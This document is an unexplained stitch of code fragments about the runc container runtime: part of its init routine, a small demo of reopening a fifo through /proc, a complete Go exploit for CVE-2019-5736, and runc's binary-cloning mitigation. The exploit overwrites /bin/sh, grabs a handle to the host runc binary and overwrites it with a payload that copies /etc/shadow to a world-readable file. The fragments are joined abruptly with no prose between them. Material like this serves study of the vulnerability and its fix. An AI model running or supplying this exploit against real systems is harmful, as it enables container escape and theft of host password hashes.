        return errors.Wrap(err, "set process label")
    }
    defer selinux.SetExecLabel("")

    // Without NoNewPrivileges seccomp is a privileged operation, so we need to
    // do this before dropping capabilities; otherwise do it as late as possible
    // just before execve so as few syscalls take place after it as possible.
    if l.config.Config.Seccomp != nil && !l.config.NoNewPrivileges {
        if err := seccomp.InitSeccomp(l.config.Config.Seccomp); err != nil {
            return err
        }
    }
    if err := finalizeNamespace(l.config); err != nil {
        return err
    }

    // finalizeNamespace can change user/group which clears the parent death
    // signal, so we restore it here.
    if err := pdeath.Restore(); err != nil {
        return errors.Wrap(err, "restore pdeath signal")
    }

    // Compare the parent from the initial start of the init process and make
    // sure that it did not change. if the parent changes that means it died
    // and we were reparented to something else so we should just kill ourself
    // and not cause problems for someone else.
    if unix.Getppid() != l.parentPid {
        return unix.Kill(unix.Getpid(), unix.SIGKILL)
    }

    // Check for the arg before waiting to make sure it exists and it is
    // returned as a create time error.
    name, err := exec.LookPath(l.config.Args[0])
    if err != nil {
        return err
    }

    // Close the pipe to signal that we have completed our init.
    logrus.Debugf("init: closing the pipe to signal completion")
    l.pipe.Close()

    // Close the log pipe fd so the parent's ForwardLogs can exit.
    if err := unix.Close(l.logFd); err != nil {
        return newSystemErrorWithCause(err, "closing log pipe fd")
    }

    // Wait for the FIFO to be opened on the other side before exec-ing the
    // user process. We open it through /proc/self/fd/$fd, because the fd that
    // was given to us was an O_PATH fd to the fifo itself. Linux allows us to
    // re-open an O_PATH fd through /proc.
    fd, err := unix.Open("/proc/self/fd/"+strconv.Itoa(l.fifoFd), unix.O_WRONLY|unix.O_CLOEXEC, 0)
    if err != nil {
        return newSystemErrorWithCause(err, "open exec fifo")
    }
    if _, err := unix.Write(fd, []byte("0")); err != nil {
        return newSystemErrorWithCause(err, "write 0 exec fifo")
    }

    // Close the O_PATH fifofd fd before exec because the kernel resets
    // dumpable in the wrong order. This has been fixed in newer kernels, but
    // we keep this to ensure CVE-2016-9962 doesn't re-emerge on older kernels.
    // N.B. the core issue itself (passing dirfds to the host filesystem) has
    // since been resolved.
    // https://github.com/torvalds/linux/blob/v4.9/fs/exec.c#L1290-L1318
    unix.Close(l.fifoFd)

    // Set seccomp as close to execve as possible, so as few syscalls take
    // place afterward (reducing the amount of syscalls that users need to
    // enable in their seccomp profiles).
    if l.config.Config.Seccomp != nil && l.config.NoNewPrivileges {
        if err := seccomp.InitSeccomp(l.config.Config.Seccomp); err != nil {
            return newSystemErrorWithCause(err, "init seccomp")
        }
    }

    s := l.config.SpecState
    s.Pid = unix.Getpid()
    s.Status = specs.StateCreated
    if err := l.config.Config.Hooks[configs.StartContainer].RunHooks(s); err != nil {
        return err
    }

    if err := unix.Exec(name, l.config.Args[0:], os.Environ()); err != nil {
        return newSystemErrorWithCause(err, "exec user process")
    }
    return nil
}
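The exec fifo near the end is how runc create and runc start synchronize: init holds only an O_PATH fd to the fifo, re-opens it writable via /proc/self/fd, and the write of "0" blocks until runc start opens the read side. A self-contained sketch of that re-open trick (the fifo path is an assumption):

package main

import (
    "fmt"
    "os"
    "strconv"

    "golang.org/x/sys/unix"
)

func main() {
    const fifoPath = "/tmp/demo-exec.fifo"
    if err := unix.Mkfifo(fifoPath, 0o622); err != nil {
        panic(err)
    }
    defer os.Remove(fifoPath)

    // An O_PATH fd references the fifo without opening it for I/O, so this
    // does not block waiting for a reader.
    pathFd, err := unix.Open(fifoPath, unix.O_PATH|unix.O_CLOEXEC, 0)
    if err != nil {
        panic(err)
    }

    done := make(chan struct{})
    // Simulate "runc start": open the read side, which unblocks the writer.
    go func() {
        defer close(done)
        rfd, err := unix.Open(fifoPath, unix.O_RDONLY, 0)
        if err != nil {
            panic(err)
        }
        buf := make([]byte, 1)
        unix.Read(rfd, buf)
        fmt.Println("reader got:", string(buf))
    }()

    // Re-open the O_PATH fd writable through procfs. This blocks until the
    // reader shows up -- exactly the create/start synchronization runc wants.
    wfd, err := unix.Open("/proc/self/fd/"+strconv.Itoa(pathFd), unix.O_WRONLY|unix.O_CLOEXEC, 0)
    if err != nil {
        panic(err)
    }
    unix.Write(wfd, []byte("0"))
    <-done
}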
package main

// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import (
    "fmt"
    "io/ioutil"
    "os"
    "strconv"
    "strings"
)

// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"

func main() {
    // First we overwrite /bin/sh with the /proc/self/exe interpreter path
    fd, err := os.Create("/bin/sh")
    if err != nil {
        fmt.Println(err)
        return
    }
    fmt.Fprintln(fd, "#!/proc/self/exe")
    err = fd.Close()
    if err != nil {
        fmt.Println(err)
        return
    }
    fmt.Println("[+] Overwritten /bin/sh successfully")

    // Loop through all processes to find one whose cmdline includes "runc init"
    // This will be the process created by runc
    var found int
    for found == 0 {
        pids, err := ioutil.ReadDir("/proc")
        if err != nil {
            fmt.Println(err)
            return
        }
        for _, f := range pids {
            fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
            fstring := string(fbytes)
            if strings.Contains(fstring, "runc") {
                fmt.Println("[+] Found the PID:", f.Name())
                found, err = strconv.Atoi(f.Name())
                if err != nil {
                    fmt.Println(err)
                    return
                }
            }
        }
    }

    // We will use the pid to get a file handle for runc on the host.
    var handleFd = -1
    for handleFd == -1 {
        // Note, you do not need to use the O_PATH flag for the exploit to work.
        handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
        if int(handle.Fd()) > 0 {
            handleFd = int(handle.Fd())
        }
    }
    fmt.Println("[+] Successfully got the file handle")

    // Now that we have the file handle, let's write to the runc binary and overwrite it
    // It will maintain its executable flag
    for {
        writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
        if int(writeHandle.Fd()) > 0 {
            fmt.Println("[+] Successfully got write handle", writeHandle)
            writeHandle.Write([]byte(payload))
            return
        }
    }
}
// libcontainer/nsenter/cloned_binary.c
int ensure_cloned_binary(void)
{
    int execfd;
    char **argv = NULL;

    /* Check that we're not self-cloned, and if we are then bail. */
    int cloned = is_self_cloned();
    if (cloned > 0 || cloned == -ENOTRECOVERABLE)
        return cloned;

    if (fetchve(&argv) < 0)
        return -EINVAL;

    /* create the cloned copy of the binary */
    execfd = clone_binary();
    if (execfd < 0)
        return -EIO;

    if (putenv(CLONED_BINARY_ENV "=1"))
        goto error;

    fexecve(execfd, argv, environ);
error:
    close(execfd);
    return -ENOEXEC;
}
static int clone_binary(void)
{
    int binfd, execfd;
    struct stat statbuf = {};
    size_t sent = 0;
    int fdtype = EFD_NONE;

    /*
     * Before we resort to copying, let's try creating an ro-binfd in one shot
     * by getting a handle for a read-only bind-mount of the execfd.
     */
    execfd = try_bindfd();
    if (execfd >= 0)
        return execfd;

    /*
     * Dammit, that didn't work -- time to copy the binary to a safe place we
     * can seal the contents.
     */
    /* create an empty clone file, ready to be written */
    execfd = make_execfd(&fdtype);
    if (execfd < 0 || fdtype == EFD_NONE)
        return -ENOTRECOVERABLE;

    /* this is the original runc binary */
    binfd = open("/proc/self/exe", O_RDONLY | O_CLOEXEC);
    if (binfd < 0)
        goto error;

    if (fstat(binfd, &statbuf) < 0)
        goto error_binfd;

    /* copy the contents across */
    while (sent < statbuf.st_size) {
        int n = sendfile(execfd, binfd, NULL, statbuf.st_size - sent);
        if (n < 0) {
            /* sendfile can fail so we fallback to a dumb user-space copy. */
            n = fd_to_fd(execfd, binfd);
            if (n < 0)
                goto error_binfd;
        }
        sent += n;
    }
    close(binfd);
    if (sent != statbuf.st_size)
        goto error;

    if (seal_execfd(&execfd, fdtype) < 0)
        goto error;

    return execfd;

error_binfd:
    close(binfd);
error:
    close(execfd);
    return -EIO;
}